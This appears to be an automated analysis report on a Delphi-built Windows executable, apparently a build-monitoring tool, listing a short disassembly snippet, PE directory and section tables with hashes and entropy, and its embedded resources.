                                                                                                                                                                                                                    call 00007F0DD15A0389h
                                                                                                                                                                                                                    movzx edx, byte ptr [006F8295h]
                                                                                                                                                                                                                    movzx eax, byte ptr [006F8294h]
                                                                                                                                                                                                                    call 00007F0DD15A08A6h
                                                                                                                                                                                                                    mov eax, dword ptr [006EDC88h]
                                                                                                                                                                                                                    movzx eax, byte ptr [eax]
                                                                                                                                                                                                                    sub al, 01h
                                                                                                                                                                                                                    jc 00007F0DD15A3371h
                                                                                                                                                                                                                    je 00007F0DD15A337Bh
                                                                                                                                                                                                                    dec al
                                                                                                                                                                                                                    je 00007F0DD15A338Ah
                                                                                                                                                                                                                    dec al
                                                                                                                                                                                                                    jne 00007F0DD15A3390h
                                                                                                                                                                                                                    call 00007F0DD159A5B3h
                                                                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                                                                    xor ecx, ecx
                                                                                                                                                                                                                    mov dl, 01h
                                                                                                                                                                                                                    call 00007F0DD159A98Ch
                                                                                                                                                                                                                    jmp 00007F0DD15A33E0h
                                                                                                                                                                                                                    call 00007F0DD15A090Eh
                                                                                                                                                                                                                    mov byte ptr [006F8294h], al
                                                                                                                                                                                                                    jmp 00007F0DD15A336Fh
                                                                                                                                                                                                                    movzx eax, byte ptr [006F8295h]
                                                                                                                                                                                                                    call 00007F0DD15A0A57h
                                                                                                                                                                                                                    mov byte ptr [006F8294h], al
                                                                                                                                                                                                                    jmp 00007F0DD15A335Ch
                                                                                                                                                                                                                    call 00007F0DD15A0B93h
                                                                                                                                                                                                                    mov byte ptr [006F8294h], al
                                                                                                                                                                                                                    cmp byte ptr [006F8294h], 00000000h
                                                                                                                                                                                                                    jne 00007F0DD15A33ABh
                                                                                                                                                                                                                    mov eax, dword ptr [006EDDD4h]
                                                                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                                                                    call 00007F0DD134086Dh
                                                                                                                                                                                                                    mov eax, dword ptr [006EDDD4h]
                                                                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                                                                    mov edx, 006DC240h
                                                                                                                                                                                                                    call 00007F0DD1340314h
                                                                                                                                                                                                                    mov ecx, dword ptr [006EDCC8h]
                                                                                                                                                                                                                    mov eax, dword ptr [006EDDD4h]
                                                                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                                                                    mov edx, dword ptr [006D3F6Ch]
                                                                                                                                                                                                                    call 00007F0DD234085Ch
                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2f90000x3f96.idata
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3290000x1ef260.rsrc
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x508c000x2918.rsrc
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2ff0000x29718.reloc
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x2fe0000x18.rdata
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x2f9bc80x9ac.idata
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                    .text0x10000x2d92940x2d9400843d15a461a9c4305f404d664c6d1b05unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                    .itext0x2db0000x12500x14009be26a59bc8233b92ec9bd79fd07ff13False0.5412109375data6.099813281792287IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                    .data0x2dd0000x110780x11200256a4c2423eae8f79b8ed7215ca95be3False0.3919793567518248data4.519234114373622IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                    .bss0x2ef0000x92980x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                    .idata0x2f90000x3f960x400059ebf4c01c9630c427cf9d4c8d4e72deFalse0.312255859375data5.248510626082326IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                    .tls0x2fd0000xd80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                    .rdata0x2fe0000x180x200bf0ac182db40dc29be077f98bf131377False0.052734375data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                    .reloc0x2ff0000x297180x29800977696233ec3926b686d0b5feb0a425fFalse0.5087125847138554data6.690448253628545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                    .rsrc0x3290000x1ef2600x1ef400b3c5a3459f4cfe7e4d03cb542f60f1beFalse0.8037331208985361data7.776375373000245IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                    RT_CURSOR0x32bf780x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                                                                    RT_CURSOR0x32c0ac0x134dataEnglishUnited States0.4642857142857143
                                                                                                                                                                                                                    RT_CURSOR0x32c1e00x134dataEnglishUnited States0.4805194805194805
                                                                                                                                                                                                                    RT_CURSOR0x32c3140x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"HebrewIsrael0.4675324675324675
                                                                                                                                                                                                                    RT_CURSOR0x32c4480x134dataEnglishUnited States0.36038961038961037
                                                                                                                                                                                                                    RT_CURSOR0x32c57c0x134dataEnglishUnited States0.4090909090909091
                                                                                                                                                                                                                    RT_CURSOR0x32c6b00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                                                                                    RT_CURSOR0x32c7e40x134dataHebrewIsrael0.3961038961038961
                                                                                                                                                                                                                    RT_CURSOR0x32c9180x134dataHebrewIsrael0.30194805194805197
                                                                                                                                                                                                                    RT_CURSOR0x32ca4c0x134dataHebrewIsrael0.30194805194805197
                                                                                                                                                                                                                    RT_CURSOR0x32cb800x134dataEnglishUnited States0.38311688311688313
                                                                                                                                                                                                                    RT_BITMAP0x32ccb40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                                                                                                                    RT_BITMAP0x32ce840x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                                                                                                                                                                    RT_BITMAP0x32d0680x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                                                                                                                    RT_BITMAP0x32d2380x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                                                                                                                                                                    RT_BITMAP0x32d4080x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                                                                                                                                                                    RT_BITMAP0x32d5d80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                                                                                                                                                    RT_BITMAP0x32d7a80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                                                                                                                                                                    RT_BITMAP0x32d9780x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                                                                                                                    RT_BITMAP0x32db480x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                                                                                                                                                                    RT_BITMAP0x32dd180x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                                                                                                                    RT_BITMAP0x32dee80xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5208333333333334
                                                                                                                                                                                                                    RT_BITMAP0x32dfa80xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42857142857142855
                                                                                                                                                                                                                    RT_BITMAP0x32e0880xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.4955357142857143
                                                                                                                                                                                                                    RT_BITMAP0x32e1680xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.38392857142857145
                                                                                                                                                                                                                    RT_BITMAP0x32e2480xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4947916666666667
                                                                                                                                                                                                                    RT_BITMAP0x32e3080xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.484375
                                                                                                                                                                                                                    RT_BITMAP0x32e3c80xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42410714285714285
                                                                                                                                                                                                                    RT_BITMAP0x32e4a80xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5104166666666666
                                                                                                                                                                                                                    RT_BITMAP0x32e5680xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.5
                                                                                                                                                                                                                    RT_BITMAP0x32e6480xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                                                                                                                                                                    RT_BITMAP0x32e7300xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4895833333333333
                                                                                                                                                                                                                    RT_BITMAP0x32e7f00x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colors0.35
                                                                                                                                                                                                                    RT_BITMAP0x32ed180xc0Device independent bitmap graphic, 11 x 11 x 4, image size 88RussianRussia0.4479166666666667
                                                                                                                                                                                                                    RT_BITMAP0x32edd80xc0Device independent bitmap graphic, 11 x 11 x 4, image size 88RussianRussia0.4479166666666667
                                                                                                                                                                                                                    RT_BITMAP0x32ee980xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128RussianRussia0.35344827586206895
                                                                                                                                                                                                                    RT_BITMAP0x32ef800x1e8Device independent bitmap graphic, 44 x 16 x 4, image size 3840.2192622950819672
                                                                                                                                                                                                                    RT_BITMAP0x32f1680x1e8Device independent bitmap graphic, 44 x 16 x 4, image size 3840.14959016393442623
                                                                                                                                                                                                                    RT_BITMAP0x32f3500x1e8Device independent bitmap graphic, 44 x 16 x 4, image size 3840.1762295081967213
                                                                                                                                                                                                                    RT_BITMAP0x32f5380x1e8Device independent bitmap graphic, 44 x 16 x 4, image size 3840.20901639344262296
                                                                                                                                                                                                                    RT_BITMAP0x32f7200x1e8Device independent bitmap graphic, 44 x 16 x 4, image size 3840.2151639344262295
                                                                                                                                                                                                                    RT_BITMAP0x32f9080x1e8Device independent bitmap graphic, 44 x 16 x 4, image size 3840.1680327868852459
                                                                                                                                                                                                                    RT_BITMAP0x32faf00x1e8Device independent bitmap graphic, 44 x 16 x 4, image size 3840.14549180327868852
                                                                                                                                                                                                                    RT_BITMAP0x32fcd80x1e8Device independent bitmap graphic, 44 x 16 x 4, image size 3840.1557377049180328
                                                                                                                                                                                                                    RT_BITMAP0x32fec00x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.36742424242424243
                                                                                                                                                                                                                    RT_BITMAP0x3303e80x518Device independent bitmap graphic, 16 x 15 x 8, image size 2400.33588957055214724
                                                                                                                                                                                                                    RT_BITMAP0x3309000x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colorsRussianRussia0.18863636363636363
                                                                                                                                                                                                                    RT_BITMAP0x330e280x518Device independent bitmap graphic, 16 x 15 x 8, image size 2400.3581288343558282
                                                                                                                                                                                                                    RT_BITMAP0x3313400x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 3859 x 3859 px/m, 256 important colorsRussianRussia0.13636363636363635
                                                                                                                                                                                                                    RT_BITMAP0x3318680x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colorsRussianRussia0.09090909090909091
                                                                                                                                                                                                                    RT_BITMAP0x331d900x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.36515151515151517
                                                                                                                                                                                                                    RT_BITMAP0x3322b80x6a8Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m0.10387323943661972
                                                                                                                                                                                                                    RT_BITMAP0x3329600x6a8Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m0.09213615023474178
                                                                                                                                                                                                                    RT_BITMAP0x3330080x6a8Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m0.10387323943661972
                                                                                                                                                                                                                    RT_BITMAP0x3336b00x6a8Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m0.0721830985915493
                                                                                                                                                                                                                    RT_BITMAP0x333d580x6a8Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m0.0698356807511737
                                                                                                                                                                                                                    RT_BITMAP0x3344000x6a8Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m0.06924882629107981
                                                                                                                                                                                                                    RT_BITMAP0x334aa80x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.33181818181818185
                                                                                                                                                                                                                    RT_BITMAP0x334fd00x108Device independent bitmap graphic, 10 x 7 x 24, image size 2240.14772727272727273
                                                                                                                                                                                                                    RT_BITMAP0x3350d80x208Device independent bitmap graphic, 10 x 15 x 24, image size 4800.13076923076923078
                                                                                                                                                                                                                    RT_BITMAP0x3352e00xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128RussianRussia0.3620689655172414
                                                                                                                                                                                                                    RT_BITMAP0x3353c80x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 3779 x 3779 px/m, 256 important colorsRussianRussia0.4682926829268293
                                                                                                                                                                                                                    RT_BITMAP0x335a300x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colors0.12954545454545455
                                                                                                                                                                                                                    RT_BITMAP0x335f580xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                                                                                                                                                    RT_BITMAP0x3360400x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colorsRussianRussia0.24772727272727274
                                                                                                                                                                                                                    RT_BITMAP0x3365680x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2898 x 2898 px/m, 256 important colors0.22575757575757577
                                                                                                                                                                                                                    RT_BITMAP0x336a900xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 2834 x 2834 px/mRussianRussia0.38362068965517243
                                                                                                                                                                                                                    RT_BITMAP0x336b780xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 3780 x 3780 px/mRussianRussia0.375
                                                                                                                                                                                                                    RT_BITMAP0x336c600x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2882 x 2882 px/m, 256 important colorsRussianRussia0.21363636363636362
                                                                                                                                                                                                                    RT_BITMAP0x3371880x518Device independent bitmap graphic, 16 x 15 x 8, image size 2400.3581288343558282
                                                                                                                                                                                                                    RT_BITMAP0x3376a00x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colorsRussianRussia0.2878787878787879
                                                                                                                                                                                                                    RT_BITMAP0x337bc80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 2835 x 2835 px/m0.3232758620689655
                                                                                                                                                                                                                    RT_BITMAP0x337cb00x1a8Device independent bitmap graphic, 40 x 16 x 4, image size 3200.17688679245283018
                                                                                                                                                                                                                    RT_BITMAP0x337e580x1a8Device independent bitmap graphic, 40 x 16 x 4, image size 3200.18160377358490565
                                                                                                                                                                                                                    RT_BITMAP0x3380000x1a8Device independent bitmap graphic, 40 x 16 x 4, image size 3200.18160377358490565
                                                                                                                                                                                                                    RT_BITMAP0x3381a80x1a8Device independent bitmap graphic, 40 x 16 x 4, image size 3200.18160377358490565
                                                                                                                                                                                                                    RT_BITMAP0x3383500x1a8Device independent bitmap graphic, 40 x 16 x 4, image size 3200.18160377358490565
                                                                                                                                                                                                                    RT_BITMAP0x3384f80x1d0Device independent bitmap graphic, 44 x 15 x 4, image size 3600.18318965517241378
                                                                                                                                                                                                                    RT_BITMAP0x3386c80x1d0Device independent bitmap graphic, 44 x 15 x 4, image size 3600.18318965517241378
                                                                                                                                                                                                                    RT_BITMAP0x3388980x1d0Device independent bitmap graphic, 44 x 15 x 4, image size 3600.18318965517241378
                                                                                                                                                                                                                    RT_BITMAP0x338a680x1d0Device independent bitmap graphic, 44 x 15 x 4, image size 3600.17456896551724138
                                                                                                                                                                                                                    RT_BITMAP0x338c380x1d0Device independent bitmap graphic, 44 x 15 x 4, image size 3600.17025862068965517
                                                                                                                                                                                                                    RT_BITMAP0x338e080xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 2835 x 2835 px/m0.3793103448275862
                                                                                                                                                                                                                    RT_BITMAP0x338ef00xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 2834 x 2834 px/mRussianRussia0.38362068965517243
                                                                                                                                                                                                                    RT_BITMAP0x338fd80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 3780 x 3780 px/mRussianRussia0.375
                                                                                                                                                                                                                    RT_BITMAP0x3390c00xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors0.4895833333333333
                                                                                                                                                                                                                    RT_BITMAP0x3391800x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colorsRussianRussia0.2787878787878788
                                                                                                                                                                                                                    RT_BITMAP0x3396a80x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.2819767441860465
                                                                                                                                                                                                                    RT_BITMAP0x3398000x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.27906976744186046
                                                                                                                                                                                                                    RT_BITMAP0x3399580x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.2936046511627907
                                                                                                                                                                                                                    RT_BITMAP0x339ab00x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.2936046511627907
                                                                                                                                                                                                                    RT_BITMAP0x339c080x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.3226744186046512
                                                                                                                                                                                                                    RT_BITMAP0x339d600x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.2616279069767442
                                                                                                                                                                                                                    RT_BITMAP0x339eb80x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.2877906976744186
                                                                                                                                                                                                                    RT_BITMAP0x33a0100x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.2761627906976744
                                                                                                                                                                                                                    RT_BITMAP0x33a1680x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.3081395348837209
                                                                                                                                                                                                                    RT_BITMAP0x33a2c00x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.3023255813953488
                                                                                                                                                                                                                    RT_BITMAP0x33a4180x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.2761627906976744
                                                                                                                                                                                                                    RT_BITMAP0x33a5700x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.29069767441860467
                                                                                                                                                                                                                    RT_BITMAP0x33a6c80x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.24709302325581395
                                                                                                                                                                                                                    RT_BITMAP0x33a8200x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.3081395348837209
                                                                                                                                                                                                                    RT_BITMAP0x33a9780x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.27325581395348836
                                                                                                                                                                                                                    RT_BITMAP0x33aad00x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.26744186046511625
                                                                                                                                                                                                                    RT_BITMAP0x33ac280x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.2877906976744186
                                                                                                                                                                                                                    RT_BITMAP0x33ad800x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.2877906976744186
                                                                                                                                                                                                                    RT_BITMAP0x33aed80x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.2703488372093023
                                                                                                                                                                                                                    RT_BITMAP0x33b0300x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.26744186046511625
                                                                                                                                                                                                                    RT_BITMAP0x33b1880x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.26453488372093026
                                                                                                                                                                                                                    RT_BITMAP0x33b2e00xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 2835 x 2835 px/m0.31896551724137934
                                                                                                                                                                                                                    RT_BITMAP0x33b3c80x528Device independent bitmap graphic, 16 x 16 x 8, image size 256RussianRussia0.31212121212121213
                                                                                                                                                                                                                    RT_BITMAP0x33b8f00xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128RussianRussia0.41810344827586204
                                                                                                                                                                                                                    RT_BITMAP0x33b9d80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128RussianRussia0.3706896551724138
                                                                                                                                                                                                                    RT_BITMAP0x33bac00x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colorsRussianRussia0.23863636363636365
                                                                                                                                                                                                                    RT_BITMAP0x33bfe80x118Device independent bitmap graphic, 7 x 10 x 24, image size 2400.1357142857142857
                                                                                                                                                                                                                    RT_BITMAP0x33c1000x2c8Device independent bitmap graphic, 31 x 7 x 24, image size 6720.09691011235955056
                                                                                                                                                                                                                    RT_BITMAP0x33c3c80xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.3794642857142857
                                                                                                                                                                                                                    RT_ICON0x33c4a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2402482269503546
                                                                                                                                                                                                                    RT_ICON0x33c9100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09943714821763602
                                                                                                                                                                                                                    RT_ICON0x33d9b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2402482269503546
                                                                                                                                                                                                                    RT_ICON0x33de200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09943714821763602
                                                                                                                                                                                                                    RT_DIALOG0x33eec80x52data0.7682926829268293
                                                                                                                                                                                                                    RT_DIALOG0x33ef1c0x52data0.7560975609756098
                                                                                                                                                                                                                    RT_STRING0x33ef700x2d4data0.3798342541436464
                                                                                                                                                                                                                    RT_STRING0x33f2440x238data0.522887323943662
                                                                                                                                                                                                                    RT_STRING0x33f47c0x188data0.5051020408163265
                                                                                                                                                                                                                    RT_STRING0x33f6040xd0StarOffice Gallery theme o, 1929405696 objects, 1st N0.6538461538461539
                                                                                                                                                                                                                    RT_STRING0x33f6d40x150data0.5
                                                                                                                                                                                                                    RT_STRING0x33f8240x4f4data0.3667192429022082
                                                                                                                                                                                                                    RT_STRING0x33fd180x2c4data0.461864406779661
                                                                                                                                                                                                                    RT_STRING0x33ffdc0x45cdata0.4211469534050179
                                                                                                                                                                                                                    RT_STRING0x3404380xd8data0.6666666666666666
                                                                                                                                                                                                                    RT_STRING0x3405100xd8data0.6574074074074074
                                                                                                                                                                                                                    RT_STRING0x3405e80x188data0.5408163265306123
                                                                                                                                                                                                                    RT_STRING0x3407700x3d8data0.41565040650406504
                                                                                                                                                                                                                    RT_STRING0x340b480x3b8data0.39285714285714285
                                                                                                                                                                                                                    RT_STRING0x340f000x3e0data0.37701612903225806
                                                                                                                                                                                                                    RT_STRING0x3412e00x36cdata0.3538812785388128
                                                                                                                                                                                                                    RT_STRING0x34164c0x378data0.40540540540540543
                                                                                                                                                                                                                    RT_STRING0x3419c40xc4data0.6173469387755102
                                                                                                                                                                                                                    RT_STRING0x341a880x9cdata0.6346153846153846
                                                                                                                                                                                                                    RT_STRING0x341b240x2d4data0.44751381215469616
                                                                                                                                                                                                                    RT_STRING0x341df80x434data0.34107806691449816
                                                                                                                                                                                                                    RT_STRING0x34222c0x2ecdata0.37566844919786097
                                                                                                                                                                                                                    RT_STRING0x3425180x304data0.3432642487046632
                                                                                                                                                                                                                    RT_RCDATA0x34281c0x10data1.5
                                                                                                                                                                                                                    RT_RCDATA0x34282c0xe04data0.5638238573021181
                                                                                                                                                                                                                    RT_RCDATA0x3436300xe5cPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0029923830250271
                                                                                                                                                                                                                    RT_RCDATA0x34448c0x1f8PNG image data, 16 x 16, 8-bit gray+alpha, non-interlaced1.0158730158730158
                                                                                                                                                                                                                    RT_RCDATA0x3446840x19aPNG image data, 16 x 16, 8-bit gray+alpha, non-interlaced1.002439024390244
                                                                                                                                                                                                                    RT_RCDATA0x3448200xcbdPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.003373198405397
                                                                                                                                                                                                                    RT_RCDATA0x3454e00xd21PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0032728354656353
                                                                                                                                                                                                                    RT_RCDATA0x3462040xccbPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0033587786259541
                                                                                                                                                                                                                    RT_RCDATA0x346ed00x1e5PNG image data, 16 x 16, 8-bit gray+alpha, non-interlaced1.0185567010309278
                                                                                                                                                                                                                    RT_RCDATA0x3470b80x1f6PNG image data, 16 x 16, 8-bit gray+alpha, non-interlaced1.0179282868525896
                                                                                                                                                                                                                    RT_RCDATA0x3472b00xe5dPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0029915692140332
                                                                                                                                                                                                                    RT_RCDATA0x3481100x43cf6Delphi compiled form 'TAgentFindForm'0.9157911791179117
                                                                                                                                                                                                                    RT_RCDATA0x38be080x617Delphi compiled form 'TBevelTitle'0.43617703656189866
                                                                                                                                                                                                                    RT_RCDATA0x38c4200x3d6Delphi compiled form 'TBuildMonitorDialogWithLinkForm'0.47963340122199594
                                                                                                                                                                                                                    RT_RCDATA0x38c7f80x4481aDelphi compiled form 'TBuildMonitorForm_'0.9107490324374025
                                                                                                                                                                                                                    RT_RCDATA0x3d10140x43c17Delphi compiled form 'TFindBarForm'0.9161991445877338
                                                                                                                                                                                                                    RT_RCDATA0x414c2c0x4b2Delphi compiled form 'TfrmBuildReport'0.5099833610648918
                                                                                                                                                                                                                    RT_RCDATA0x4150e00x3a3Delphi compiled form 'TInputDialog'0.5445757250268528
                                                                                                                                                                                                                    RT_RCDATA0x4154840x43687Delphi compiled form 'TMonitorGraphListForm'0.9217067543634079
                                                                                                                                                                                                                    RT_RCDATA0x458b0c0x7a34aDelphi compiled form 'TMonitorViewForm'0.6451651570060373
                                                                                                                                                                                                                    RT_RCDATA0x4d2e580x441a0Delphi compiled form 'TOpenBuildMonFileDialog'0.9121830905127911
                                                                                                                                                                                                                    RT_RCDATA0x516ff80x573Delphi compiled form 'TSaveAttachmentsForm'0.45878136200716846
                                                                                                                                                                                                                    RT_GROUP_CURSOR0x51756c0x14Lotus unknown worksheet or configuration, revision 0x1HebrewIsrael1.3
                                                                                                                                                                                                                    RT_GROUP_CURSOR0x5175800x14Lotus unknown worksheet or configuration, revision 0x1HebrewIsrael1.3
                                                                                                                                                                                                                    RT_GROUP_CURSOR0x5175940x14Lotus unknown worksheet or configuration, revision 0x1HebrewIsrael1.3
                                                                                                                                                                                                                    RT_GROUP_CURSOR0x5175a80x14Lotus unknown worksheet or configuration, revision 0x1HebrewIsrael1.3
                                                                                                                                                                                                                    RT_GROUP_CURSOR0x5175bc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                    RT_GROUP_CURSOR0x5175d00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                    RT_GROUP_CURSOR0x5175e40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                    RT_GROUP_CURSOR0x5175f80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                    RT_GROUP_CURSOR0x51760c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
